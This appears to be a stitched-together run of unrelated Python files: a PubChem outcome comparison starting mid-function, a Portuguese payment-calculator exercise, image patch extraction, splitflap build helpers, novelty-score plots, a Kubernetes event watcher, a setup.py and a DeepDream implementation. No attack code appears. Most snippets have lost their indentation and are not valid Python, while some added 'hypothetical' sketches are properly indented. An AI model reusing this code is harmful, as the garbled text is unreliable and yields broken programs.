else: print >>sys.stderr, 'ERROR: outcomeA=%d'%(sidsA[sid]['outcome'])
if sidsB.has_key(sid):
outcomeB=sidsB[sid]['outcome']
if outcomeB==2: n_activeB+=1
elif outcomeB==1: n_inactiveB+=1
elif outcomeB==3: n_inconclusiveB+=1
elif outcomeB==4: n_unspecifiedB+=1
elif outcomeB==5: n_discrepantB+=1
else: print >>sys.stderr, 'ERROR: outcomeB=%d'%(sidsB[sid]['outcome'])
if outcomeA==2 and outcomeB==2:
n_active_common+=1
if verbose>1:
print >>sys.stderr, '\tA: active: %3d'%(n_activeA)
print >>sys.stderr, '\tA: inactive: %3d'%(n_inactiveA)
print >>sys.stderr, '\tA: inconclusive: %3d'%(n_inconclusiveA)
print >>sys.stderr, '\tA: unspecified: %3d'%(n_unspecifiedA)
print >>sys.stderr, '\tA: discrepant: %3d'%(n_discrepantA)
print >>sys.stderr, '\tA: total: %3d'%(len(sidsA.keys()))
print >>sys.stderr, '\tB: active: %3d'%(n_activeB)
print >>sys.stderr, '\tB: inactive: %3d'%(n_inactiveB)
print >>sys.stderr, '\tB: inconclusive: %3d'%(n_inconclusiveB)
print >>sys.stderr, '\tB: unspecified: %3d'%(n_unspecifiedB)
print >>sys.stderr, '\tB: discrepant: %3d'%(n_discrepantB)
print >>sys.stderr, '\tB: total: %3d'%(len(sidsB.keys()))
print >>sys.stderr, '\t common active: %3d'%(n_active_common)
sim = float(n_active_common) / len(sids_common)
print >>sys.stderr, '\t Tanimoto similarity: %.3f'%(sim)
|
## Managing Payments
print('{:=^40}'.format(' Loja do Wollacy '))
valor=float(input('Qual valor da compra? '))
print('''FORMAS DE PAGAMENTO
[1] à vista dinheiro
[2] débito
[3] até 3x cartão
[4] mais de 3x no cartão
''')
opcao=int(input('Escolha a opção de pagamento: '))
if opcao==1:
valorFinal=valor-(valor*10/100)
print('Valor total= R$ {:.2f}'.format(valorFinal))
elif opcao==2:
valorFinal=valor-(valor*5/100)
print('Valor total= R$ {:.2f}'.format(valorFinal))
elif opcao==3:
valorFinal=valor
parcela=int(input('Digite o número de parcelas: '))
vlrParcela=valorFinal/parcela
print('Sua compra parcelada em {}x SEM juros. Valor de R$ {:.2f} por parcela. Valor total= R$ {:.2f}'.format(parcela, vlrParcela, valorFinal))
elif opcao==4:
valorFinal=valor+(valor*20/100)
parcela=int(input('Digite o número de parcelas: '))
vlrParcela=valorFinal/parcela
print('Sua compra parcelada em {}x COM juros de 20%. Valor de R$ {:.2f} por parcela. Valor total= R$ {:.2f}'.format(parcela, vlrParcela, valorFinal))
else:
print('Opção inválida!')
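# Hypothetical refactor sketch (not part of the original exercise): the same pricing rules
# expressed as a lookup table; 'valor' is the purchase amount and 'opcao' the payment option.
def preco_final(valor, opcao):
    multiplicadores = {1: 0.90, 2: 0.95, 3: 1.00, 4: 1.20}
    if opcao not in multiplicadores:
        raise ValueError('Opção inválida!')
    return valor * multiplicadores[opcao]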
|
import numpy as np
import math
def extract_patches(kpts, img, PS=32, mag_factor = 10.0, input_format = 'cv2'):
"""
Extracts patches given the keypoints in the one of the following formats:
- cv2: list of cv2 keypoints
- cv2+A: tuple of (list of cv2 keypoints, Nx2x2 np array)
- ellipse: Nx5 np array, single row is [x y a b c]
- xyA: Nx6 np array, single row is [x y a11 a12 a21 a22]
- LAF: Nx2x3 np array, single row is [a11 a12 x; a21 a22 y]
Returns list of patches.
    Upgraded version of https://github.com/vbalnt/tfeat/blob/master/tfeat_utils.py
mag_factor is a scale coefficient. Use 10 for extracting OpenCV SIFT patches,
1.0 for OpenCV ORB patches, etc
PS is the output patch size in pixels
"""
if input_format == 'cv2':
Ms, pyr_idxs = convert_cv2_keypoints(kpts, PS, mag_factor)
elif input_format == 'cv2+A':
Ms, pyr_idxs = convert_cv2_plus_A_keypoints(kpts[0], kpts[1], PS, mag_factor)
elif (input_format == 'ellipse') or (input_format == 'xyabc'):
assert kpts.shape[1] == 5
Ms, pyr_idxs = convert_ellipse_keypoints(kpts, PS, mag_factor)
elif input_format == 'xyA':
assert kpts.shape[1] == 6
Ms, pyr_idxs = convert_xyA(kpts, PS, mag_factor)
elif input_format == 'LAF':
assert len(kpts.shape) == 3
        assert kpts.shape[2] == 3
        assert kpts.shape[1] == 2
Ms, pyr_idxs = convert_LAFs(kpts, PS, mag_factor)
else:
raise ValueError('Unknown input format',input_format)
return extract_patches_Ms(Ms, img, pyr_idxs, PS)
def build_image_pyramid(img, min_size):
"""
Builds image pyramid
"""
import cv2
import math
patches = []
img_pyr = [img]
cur_img = img
while np.min(cur_img.shape[:2]) > min_size:
cur_img = cv2.pyrDown(cur_img)
img_pyr.append(cur_img)
return img_pyr
def extract_patches_Ms(Ms, img, pyr_idxs = [], PS=32):
"""
Builds image pyramid and rectifies patches around keypoints
in the tranformation matrix format
from the appropriate level of image pyramid,
removing high freq artifacts. Border mode is set to "replicate",
    so the boundary patches don't have crazy black borders.
Returns list of patches.
Upgraded version of
https://github.com/vbalnt/tfeat/blob/master/tfeat_utils.py
"""
assert len(Ms) == len(pyr_idxs)
import cv2
import math
img_pyr = build_image_pyramid(img, PS/2.0)
patches = []
for i, M in enumerate(Ms):
patch = cv2.warpAffine(img_pyr[pyr_idxs[i]], M, (PS, PS),
flags=cv2.WARP_INVERSE_MAP + \
cv2.INTER_LINEAR + cv2.WARP_FILL_OUTLIERS, borderMode=cv2.BORDER_REPLICATE)
patches.append(patch)
return patches
def convert_cv2_keypoints(kps, PS, mag_factor):
"""
Converts OpenCV keypoints into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, kp in enumerate(kps):
x,y = kp.pt
s = kp.size
a = kp.angle
s = mag_factor * s / PS
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
s_pyr = s / d_factor
cos = math.cos(a * math.pi / 180.0)
sin = math.sin(a * math.pi / 180.0)
M = np.matrix([
[+s_pyr * cos, -s_pyr * sin, (-s_pyr * cos + s_pyr * sin) * PS / 2.0 + x/d_factor],
[+s_pyr * sin, +s_pyr * cos, (-s_pyr * sin - s_pyr * cos) * PS / 2.0 + y/d_factor]])
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
def convert_cv2_plus_A_keypoints(kps, A, PS, mag_factor):
"""
Converts OpenCV keypoints + A [n x 2 x 2] affine shape
into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, kp in enumerate(kps):
x,y = kp.pt
s = kp.size
a = kp.angle
s = mag_factor * s / PS
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
s_pyr = s / d_factor
cos = math.cos(a * math.pi / 180.0)
sin = math.sin(a * math.pi / 180.0)
Ai = A[i]
RotA = np.matrix([
[+s_pyr * cos, -s_pyr * sin],
[+s_pyr * sin, +s_pyr * cos]])
Ai = np.matmul(RotA,np.matrix(Ai))
M = np.concatenate([Ai, [
[(-Ai[0,0] - Ai[0,1]) * PS / 2.0 + x/d_factor],
[(-Ai[1,0] - Ai[1,1]) * PS / 2.0 + y/d_factor]]], axis = 1)
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
def convert_xyA(kps, PS, mag_factor):
"""
Converts n x [x y a11 a12 a21 a22] affine regions
into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, kp in enumerate(kps):
x = kp[0]
y = kp[1]
Ai = mag_factor * kp[2:].reshape(2,2) / PS
s = np.sqrt(np.abs(Ai[0,0]*Ai[1,1]-Ai[0,1]*Ai[1,0]))
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
Ai = Ai / d_factor
M = np.concatenate([Ai, [
[(-Ai[0,0] - Ai[0,1]) * PS / 2.0 + x/d_factor],
[(-Ai[1,0] - Ai[1,1]) * PS / 2.0 + y/d_factor]]], axis = 1)
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
def convert_LAFs(kps, PS, mag_factor):
"""
Converts n x [ a11 a12 x; a21 a22 y] affine regions
into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, kp in enumerate(kps):
x = kp[0,2]
y = kp[1,2]
Ai = mag_factor * kp[:2,:2] / PS
s = np.sqrt(np.abs(Ai[0,0]*Ai[1,1]-Ai[0,1]*Ai[1,0]))
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
Ai = Ai / d_factor
M = np.concatenate([Ai, [
[(-Ai[0,0] - Ai[0,1]) * PS / 2.0 + x/d_factor],
[(-Ai[1,0] - Ai[1,1]) * PS / 2.0 + y/d_factor]]], axis = 1)
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
def Ell2LAF(ell):
"""
Converts ellipse [x y a b c] into [ a11 a12 x; a21 a22 y] affine region
"""
A23 = np.zeros((2,3))
A23[0,2] = ell[0]
A23[1,2] = ell[1]
a = ell[2]
b = ell[3]
c = ell[4]
sc = np.sqrt(np.sqrt(a*c - b*b))
    ia,ib,ic = invSqrt(a,b,c)  # because sqrtm returns a [::-1, ::-1] matrix, don't know why
A = np.array([[ia, ib], [ib, ic]]) / sc
sc = np.sqrt(A[0,0] * A[1,1] - A[1,0] * A[0,1])
A23[0:2,0:2] = rectifyAffineTransformationUpIsUp(A / sc) * sc
return A23
def invSqrt(a,b,c):
eps = 1e-12
mask = (b != 0)
r1 = mask * (c - a) / (2. * b + eps)
t1 = np.sign(r1) / (np.abs(r1) + np.sqrt(1. + r1*r1));
r = 1.0 / np.sqrt( 1. + t1*t1)
t = t1*r;
r = r * mask + 1.0 * (1.0 - mask);
t = t * mask;
x = 1. / np.sqrt( r*r*a - 2*r*t*b + t*t*c)
z = 1. / np.sqrt( t*t*a + 2*r*t*b + r*r*c)
d = np.sqrt( x * z)
x = x / d
z = z / d
new_a = r*r*x + t*t*z
new_b = -r*t*x + t*r*z
new_c = t*t*x + r*r *z
return new_a, new_b, new_c
def rectifyAffineTransformationUpIsUp(A):
"""
Sets [ a11 a12; a21 a22] into upright orientation
"""
det = np.sqrt(np.abs(A[0,0]*A[1,1] - A[1,0]*A[0,1] + 1e-10))
b2a2 = np.sqrt(A[0,1] * A[0,1] + A[0,0] * A[0,0])
A_new = np.zeros((2,2))
A_new[0,0] = b2a2 / det
A_new[0,1] = 0
A_new[1,0] = (A[1,1]*A[0,1]+A[1,0]*A[0,0])/(b2a2*det)
A_new[1,1] = det / b2a2
return A_new
def convert_ellipse_keypoints(ells, PS, mag_factor):
"""
Converts n x [ x y a b c] affine regions
into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, ell in enumerate(ells):
LAF = Ell2LAF(ell)
x = LAF[0,2]
y = LAF[1,2]
Ai = mag_factor * LAF[:2,:2] / PS
s = np.sqrt(np.abs(Ai[0,0]*Ai[1,1]-Ai[0,1]*Ai[1,0]))
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
Ai = Ai / d_factor
M = np.concatenate([Ai, [
[(-Ai[0,0] - Ai[0,1]) * PS / 2.0 + x/d_factor],
[(-Ai[1,0] - Ai[1,1]) * PS / 2.0 + y/d_factor]]], axis = 1)
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
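# Hypothetical usage sketch (not part of the original module): extract 32x32 patches around
# OpenCV SIFT keypoints. 'image.jpg' is a placeholder; SIFT_create requires OpenCV >= 4.4,
# and the image should be reasonably large so the pyramid indices stay in range.
if __name__ == '__main__':
    import cv2
    img = cv2.cvtColor(cv2.imread('image.jpg'), cv2.COLOR_BGR2GRAY)
    kpts = cv2.SIFT_create().detect(img, None)
    patches = extract_patches(kpts, img, PS=32, mag_factor=10.0, input_format='cv2')
    print('Extracted %d patches of shape %s' % (len(patches), patches[0].shape))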
|
#!/usr/bin/env python
# Copyright 2015-2016 Scott Bezek and the splitflap contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import re
import subprocess
import sys
import tempfile
import time
from contextlib import contextmanager
electronics_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
repo_root = os.path.dirname(electronics_root)
sys.path.append(repo_root)
from thirdparty.xvfbwrapper.xvfbwrapper import Xvfb
from util import file_util, rev_info
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
class PopenContext(subprocess.Popen):
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if self.stdout:
self.stdout.close()
if self.stderr:
self.stderr.close()
if self.stdin:
self.stdin.close()
if type:
self.terminate()
# Wait for the process to terminate, to avoid zombies.
self.wait()
def xdotool(command):
return subprocess.check_output(['xdotool'] + command)
def wait_for_window(name, window_regex, additional_commands=None, timeout=10):
if additional_commands is not None:
commands = additional_commands
else:
commands = []
DELAY = 0.5
logger.info('Waiting for %s window...', name)
for i in range(int(timeout/DELAY)):
try:
xdotool(['search', '--name', window_regex] + commands)
logger.info('Found %s window', name)
return
except subprocess.CalledProcessError:
pass
time.sleep(DELAY)
raise RuntimeError('Timed out waiting for %s window' % name)
@contextmanager
def recorded_xvfb(video_filename, **xvfb_args):
with Xvfb(**xvfb_args):
with PopenContext([
'recordmydesktop',
'--no-sound',
'--no-frame',
'--on-the-fly-encoding',
'-o', video_filename], close_fds=True) as screencast_proc:
yield
screencast_proc.terminate()
def get_versioned_contents(filename):
with open(filename, 'r') as f:
original_contents = f.read()
date = rev_info.current_date()
rev = rev_info.git_short_rev()
logger.info('Replacing placeholders with %s and %s' % (date, rev))
return original_contents, original_contents \
.replace('Date ""', 'Date "%s"' % date) \
.replace('DATE: YYYY-MM-DD', 'DATE: %s' % date) \
.replace('Rev ""', 'Rev "%s"' % rev) \
.replace('COMMIT: deadbeef', 'COMMIT: %s' % rev)
@contextmanager
def versioned_file(filename):
original_contents, versioned_contents = get_versioned_contents(filename)
with open(filename, 'w') as temp_schematic:
logger.debug('Writing to %s', filename)
temp_schematic.write(versioned_contents)
try:
yield
finally:
with open(filename, 'w') as temp_schematic:
logger.debug('Restoring %s', filename)
temp_schematic.write(original_contents)
@contextmanager
def patch_config(filename, replacements):
if not os.path.exists(filename):
yield
return
with open(filename, 'r') as f:
original_contents = f.read()
new_contents = original_contents
for (key, value) in replacements.items():
pattern = '^' + re.escape(key) + '=(.*)$'
new_contents = re.sub(pattern, key + '=' + value, new_contents, flags=re.MULTILINE)
with open(filename, 'w') as f:
logger.debug('Writing to %s', filename)
f.write(new_contents)
try:
yield
finally:
with open(filename, 'w') as f:
logger.debug('Restoring %s', filename)
f.write(original_contents)
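# Hypothetical usage sketch (not part of the original module): temporarily rewrite a
# key=value entry in a config file while a tool runs, then restore the original contents.
# 'example.cfg' and the key name are placeholders.
if __name__ == '__main__':
    with patch_config('example.cfg', {'PlotOutputDirectory': '/tmp/plots'}):
        subprocess.check_call(['true'])  # placeholder for the command that reads the config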
|
from typing import Union, Optional
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from statannot import add_stat_annotation
plt.style.use("default")
plt.rcParams.update(plt.rcParamsDefault)
def plot_scores_boxplot(scores_test: Union[dict, pd.DataFrame],
scores_new: Union[dict, pd.DataFrame],
show_outliers: bool = True,
stat_test: str = "Mann-Whitney-ls",
return_results: bool = True,
title: str = "",
figsize=(15, 8),
save_dir: Optional[str] = None,
):
"""
Plots scores of two datasets as a boxplot with statistical annotation.
Parameters
----------
scores_test: Union[dict, pd.DataFrame]
Test scores (baseline) obtained by each model.
scores_new: Union[dict, pd.DataFrame]
New scores to be compared with the test scores.
show_outliers: bool
Indicates whether outliers are shown in the plot.
stat_test: str
Specify which statistical test should be used for comparison. Must be one of: [`Levene`, `Mann-Whitney`,
`Mann-Whitney-gt`, `Mann-Whitney-ls`, `t-test_ind`, `t-test_welch`, `t-test_paired`, `Wilcoxon`, `Kruskal`]
return_results: bool
If true, returns a dictionary of StatResult objects for each model.
title : str
Title to appear on the plot
figsize
Returns
-------
    test_results: Optional[dict[str, StatResult]]
Dictionary of StatResult objects for each model that contain a desired statistic and a p-value.
"""
plt.style.use("default")
assert set(scores_test.keys()) == set(scores_new.keys())
fig = plt.figure(figsize=figsize)
columns = scores_test.keys()
df_test, df_new = pd.DataFrame(scores_test), pd.DataFrame(scores_new)
df_test["type"] = ["Test"] * df_test.shape[0]
df_new["type"] = ["OOD"] * df_new.shape[0]
df_scores = pd.concat([df_test, df_new])
if return_results:
test_results = {}
for i, key in enumerate(columns):
ax = fig.add_subplot(3, 6, i + 1)
sns.boxplot(data=df_scores,
x="type",
y=key,
ax=ax,
showfliers=show_outliers)
ax.set_xticklabels(["Test Data", "OOD Data"])
ax.set_title(key)
stats = add_stat_annotation(ax,
data=df_scores,
x="type",
y=key,
box_pairs=[("Test", "OOD")],
test=stat_test,
loc='outside',
verbose=0,
line_offset_to_box=0.2)
ax.set_xlabel("")
ax.set_ylabel("Novelty Scores")
if return_results:
test_results[key] = stats
plt.suptitle(title, y=1.005, x=0.45)
fig.tight_layout(pad=1.0)
if save_dir is not None:
plt.savefig(save_dir, dpi=300, bbox_inches="tight")
plt.close()
else:
plt.show()
if return_results:
return test_results
def plot_scores_distr(scores_test: Union[dict, pd.DataFrame],
scores_new: Union[dict, pd.DataFrame],
clip_q: float = 0,
save_dir: Optional[str] = None,
figsize=(15, 6),
title="",
labels=None,
**kwargs,
):
"""
Parameters
----------
save_dir
scores_test: Union[dict, pd.DataFrame]
Test scores (baseline) obtained by each model.
scores_new: Union[dict, pd.DataFrame]
New scores to be compared with the test scores.
clip_q: float
Float that specifies the inter-quantile region to be plotted. If zero, all values are plotted.
        It is used to remove outlier points from the plot to better see details of the distributions.
        Example: clip_q = 0.05 clips scores above the 0.95 quantile of either set before plotting.
figsize
**kwargs
Arguments passed to the pandas.DataFrame.plot() function
"""
plt.style.use("default")
assert 0 <= clip_q < 0.5
assert set(scores_test.keys()) == set(scores_new.keys())
fig = plt.figure(figsize=figsize)
for i, key in enumerate(scores_test.keys()):
scores_test_ax = pd.Series(scores_test[key])
scores_new_ax = pd.Series(scores_new[key])
ax = fig.add_subplot(3, 6, i + 1)
clip_min = min(min(scores_test_ax), min(scores_new_ax))
clip_max = max(scores_test_ax.quantile(1 - clip_q), scores_new_ax.quantile(1 - clip_q))
np.clip(scores_test_ax, clip_min, clip_max).plot(ax=ax,
label="Test",
alpha=0.9,
density=True,
**kwargs)
np.clip(scores_new_ax, clip_min, clip_max).plot(ax=ax,
label="OOD",
density=True,
alpha=0.6,
**kwargs)
label = "Novelty Score"
if labels is not None:
try:
label = labels[key]
            except (KeyError, IndexError, TypeError):
pass
ax.set_xlabel(label)
ax.legend()
ax.set_title(key)
fig.tight_layout(pad=1.0)
plt.suptitle(title, y=1.01)
if save_dir is not None:
plt.savefig(save_dir, dpi=300, bbox_inches="tight")
plt.close()
else:
plt.show()
def plot_heatmap(df: pd.DataFrame,
title: str = "",
figsize: tuple = (10, 3),
save_dir: Optional[str] = None,
                 annot: Union[bool, np.ndarray] = True,
vmin: float = 0.5,
vmax: float = 1.0,
cmap: str = "OrRd",
**kwargs):
"""
Plots provided dataframe as sns.heatmap.
Parameters
----------
df: pd.DataFrame
Dataframe to be plotted.
title: str
Title to display on the top of the plot.
figsize: tuple
Indicates size of the image.
save_dir: Optional(str)
If provided, the plot will be saved in this directory.
annot: bool, np.ndarray
If annot is set to True, adds a simple annotation of the value to the plotted heatmap. Alternatively,
a custom annotation in an array can be provided where array shape corresponds to the dataframe shape.
vmin, vmax : float
Minimal and maximal value to use in the colorbar.
cmap: str
Color map to be used.
kwargs:
Other arguments to be passed to sns.heatmap
Returns
-------
"""
plt.style.use("default")
_, ax = plt.subplots(figsize=figsize)
sns.set(font_scale=0.9)
sns.heatmap(
df.T,
vmin=vmin,
vmax=vmax,
ax=ax,
cmap=cmap,
annot=annot,
**kwargs
)
plt.setp(ax.get_yticklabels(), rotation=0, ha="right", rotation_mode="anchor")
plt.xticks()
plt.yticks()
plt.title(title)
if save_dir is not None:
plt.savefig(save_dir, dpi=300, bbox_inches="tight")
plt.close()
else:
plt.show()
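# Hypothetical usage sketch with synthetic scores (model names and values are made up):
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    scores_test = {'modelA': rng.normal(0.0, 1.0, 200), 'modelB': rng.normal(0.0, 1.0, 200)}
    scores_new = {'modelA': rng.normal(0.8, 1.0, 200), 'modelB': rng.normal(1.5, 1.0, 200)}
    results = plot_scores_boxplot(scores_test, scores_new, title='Synthetic example')
    plot_scores_distr(scores_test, scores_new, clip_q=0.01, kind='hist', bins=30)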
|
import queue
import logging
import argparse
import kubernetes.client
from utils.kubernetes.config import configure
from utils.signal import install_shutdown_signal_handlers
from utils.kubernetes.watch import KubeWatcher, WatchEventType
from utils.threading import SupervisedThread, SupervisedThreadGroup
from .config import load_config
from .format import format_event
log = logging.getLogger(__name__)
def main():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--master', help='kubernetes api server url')
arg_parser.add_argument('--in-cluster', action='store_true', help='configure with in-cluster config')
arg_parser.add_argument('--log-level', default='WARNING')
arg_parser.add_argument('--config', required=True)
args = arg_parser.parse_args()
logging.basicConfig(format='%(levelname)s: %(message)s', level=args.log_level)
configure(args.master, args.in_cluster)
install_shutdown_signal_handlers()
config = load_config(args.config)
q = queue.Queue()
threads = SupervisedThreadGroup()
threads.add_thread(WatcherThread(q))
threads.add_thread(HandlerThread(q, config))
threads.start_all()
threads.wait_any()
class HandlerThread(SupervisedThread):
def __init__(self, queue, config):
super().__init__()
self.queue = queue
self.config = config
def run_supervised(self):
while True:
event = self.queue.get()
self.handle(event)
def handle(self, event):
for mapping in self.config.mappings:
if mapping.does_match(event):
try:
mapping.sink(event)
except Exception:
log.exception('Failed to handle event')
class WatcherThread(SupervisedThread):
def __init__(self, queue):
super().__init__(daemon=True)
self.queue = queue
def run_supervised(self):
v1 = kubernetes.client.CoreV1Api()
watcher = iter(KubeWatcher(v1.list_event_for_all_namespaces))
for event_type, event in watcher:
if event_type == WatchEventType.DONE_INITIAL:
break
for event_type, event in watcher:
if event_type != WatchEventType.ADDED:
continue
event._formatted = format_event(event)
self.queue.put(event)
if __name__ == '__main__':
main()
|
from setuptools import setup
setup(
name='equibel',
version='0.9.5', # v0.9.5
description='A toolkit for equivalence-based belief change',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
],
keywords=['AI', 'belief change', 'belief revision', 'belief merging', 'multi-agent network'],
url='https://github.com/asteroidhouse/equibel',
author='Paul Vicol',
author_email='pvicol@sfu.ca',
license='MIT',
packages=[
'equibel',
],
include_package_data = True,
install_requires=[
'networkx',
'ply',
'sympy',
],
)
|
""""
this package contains the main and support classes for the layout widgets
"""
|
"""
This file contains the implementation of the DeepDream algorithm.
If you have problems understanding any parts of the code,
go ahead and experiment with functions in the playground.py file.
"""
import os
import argparse
import shutil
import time
import numpy as np
import torch
import cv2 as cv
import utils.utils as utils
from utils.constants import *
import utils.video_utils as video_utils
from collections import namedtuple
from torchvision import models
from torch.hub import download_url_to_file
# loss.backward(layer) <- the original implementation did it like this; it's equivalent to MSE(reduction='sum')/2
def gradient_ascent(config, model, input_tensor, layer_ids_to_use, iteration):
# Step 0: Feed forward pass
out = model(input_tensor)
# Step 1: Grab activations/feature maps of interest
activations = [out[layer_id_to_use] for layer_id_to_use in layer_ids_to_use]
# Step 2: Calculate loss over activations
losses = []
for layer_activation in activations:
# Use torch.norm(torch.flatten(layer_activation), p) with p=2 for L2 loss and p=1 for L1 loss.
# But I'll use the MSE as it works really good, I didn't notice any serious change when going to L1/L2.
# using torch.zeros_like as if we wanted to make activations as small as possible but we'll do gradient ascent
# and that will cause it to actually amplify whatever the network "sees" thus yielding the famous DeepDream look
loss_component = torch.nn.MSELoss(reduction='mean')(layer_activation, torch.zeros_like(layer_activation))
losses.append(loss_component)
loss = torch.mean(torch.stack(losses))
loss.backward()
# Step 3: Process image gradients (smoothing + normalization)
grad = input_tensor.grad.data
# Applies 3 Gaussian kernels and thus "blurs" or smoothens the gradients and gives visually more pleasing results
# sigma is calculated using an arbitrary heuristic feel free to experiment
sigma = ((iteration + 1) / config['num_gradient_ascent_iterations']) * 2.0 + config['smoothing_coefficient']
smooth_grad = utils.CascadeGaussianSmoothing(kernel_size=9, sigma=sigma)(grad) # "magic number" 9 just works well
# Normalize the gradients (make them have mean = 0 and std = 1)
# I didn't notice any big difference normalizing the mean as well - feel free to experiment
g_std = torch.std(smooth_grad)
g_mean = torch.mean(smooth_grad)
smooth_grad = smooth_grad - g_mean
smooth_grad = smooth_grad / g_std
# Step 4: Update image using the calculated gradients (gradient ascent step)
input_tensor.data += config['lr'] * smooth_grad
# Step 5: Clear gradients and clamp the data (otherwise values would explode to +- "infinity")
input_tensor.grad.data.zero_()
input_tensor.data = torch.max(torch.min(input_tensor, UPPER_IMAGE_BOUND), LOWER_IMAGE_BOUND)
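# Hypothetical alternative loss (a sketch, not used by default): the norm-based variant
# mentioned in the comment inside gradient_ascent; p=2 gives an L2 loss, p=1 an L1 loss.
def norm_loss(layer_activation, p=2):
    return torch.norm(torch.flatten(layer_activation), p)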
def deep_dream_static_image(config, img):
model = utils.fetch_and_prepare_model(config['model_name'], config['pretrained_weights'], DEVICE)
try:
layer_ids_to_use = [model.layer_names.index(layer_name) for layer_name in config['layers_to_use']]
except Exception as e: # making sure you set the correct layer name for this specific model
print(f'Invalid layer names {[layer_name for layer_name in config["layers_to_use"]]}.')
print(f'Available layers for model {config["model_name"]} are {model.layer_names}.')
return
if img is None: # load either the provided image or start from a pure noise image
img_path = utils.parse_input_file(config['input'])
# load a numpy, [0, 1] range, channel-last, RGB image
img = utils.load_image(img_path, target_shape=config['img_width'])
if config['use_noise']:
shape = img.shape
img = np.random.uniform(low=0.0, high=1.0, size=shape).astype(np.float32)
img = utils.pre_process_numpy_img(img)
base_shape = img.shape[:-1] # save initial height and width
# Note: simply rescaling the whole result (and not only details, see original implementation) gave me better results
# Going from smaller to bigger resolution (from pyramid top to bottom)
for pyramid_level in range(config['pyramid_size']):
new_shape = utils.get_new_shape(config, base_shape, pyramid_level)
img = cv.resize(img, (new_shape[1], new_shape[0]))
input_tensor = utils.pytorch_input_adapter(img, DEVICE)
for iteration in range(config['num_gradient_ascent_iterations']):
h_shift, w_shift = np.random.randint(-config['spatial_shift_size'], config['spatial_shift_size'] + 1, 2)
input_tensor = utils.random_circular_spatial_shift(input_tensor, h_shift, w_shift)
gradient_ascent(config, model, input_tensor, layer_ids_to_use, iteration)
input_tensor = utils.random_circular_spatial_shift(input_tensor, h_shift, w_shift, should_undo=True)
img = utils.pytorch_output_adapter(input_tensor)
return utils.post_process_numpy_img(img)
def deep_dream_video_ouroboros(config):
"""
Feeds the output dreamed image back to the input and repeat
Name etymology for nerds: https://en.wikipedia.org/wiki/Ouroboros
"""
ts = time.time()
assert any([config['input_name'].lower().endswith(img_ext) for img_ext in SUPPORTED_IMAGE_FORMATS]), \
f'Expected an image, but got {config["input_name"]}. Supported image formats {SUPPORTED_IMAGE_FORMATS}.'
utils.print_ouroboros_video_header(config) # print some ouroboros-related metadata to the console
img_path = utils.parse_input_file(config['input'])
# load numpy, [0, 1] range, channel-last, RGB image
# use_noise and consequently None value, will cause it to initialize the frame with uniform, [0, 1] range, noise
frame = None if config['use_noise'] else utils.load_image(img_path, target_shape=config['img_width'])
for frame_id in range(config['ouroboros_length']):
print(f'Ouroboros iteration {frame_id+1}.')
# Step 1: apply DeepDream and feed the last iteration's output to the input
frame = deep_dream_static_image(config, frame)
dump_path = utils.save_and_maybe_display_image(config, frame, name_modifier=frame_id)
print(f'Saved ouroboros frame to: {os.path.relpath(dump_path)}\n')
# Step 2: transform frame e.g. central zoom, spiral, etc.
        # Note: this part amplifies the psychedelic-like appearance
frame = utils.transform_frame(config, frame)
video_utils.create_video_from_intermediate_results(config)
print(f'time elapsed = {time.time()-ts} seconds.')
class ResNet50(torch.nn.Module):
def __init__(self, pretrained_weights, requires_grad=False, show_progress=False):
super().__init__()
if pretrained_weights == SupportedPretrainedWeights.IMAGENET.name:
resnet50 = models.resnet50(pretrained=True, progress=show_progress).eval()
elif pretrained_weights == SupportedPretrainedWeights.PLACES_365.name:
resnet50 = models.resnet50(pretrained=False, progress=show_progress).eval()
binary_name = 'resnet50_places365.pth.tar'
resnet50_places365_binary_path = os.path.join(BINARIES_PATH, binary_name)
if os.path.exists(resnet50_places365_binary_path):
state_dict = torch.load(resnet50_places365_binary_path)['state_dict']
else:
binary_url = r'http://places2.csail.mit.edu/models_places365/resnet50_places365.pth.tar'
print(f'Downloading {binary_name} from {binary_url} it may take some time.')
download_url_to_file(binary_url, resnet50_places365_binary_path)
print('Done downloading.')
state_dict = torch.load(resnet50_places365_binary_path)['state_dict']
new_state_dict = {} # modify key names and make it compatible with current PyTorch model naming scheme
for old_key in state_dict.keys():
new_key = old_key[7:]
new_state_dict[new_key] = state_dict[old_key]
resnet50.fc = torch.nn.Linear(resnet50.fc.in_features, 365)
resnet50.load_state_dict(new_state_dict, strict=True)
else:
raise Exception(f'Pretrained weights {pretrained_weights} not yet supported for {self.__class__.__name__} model.')
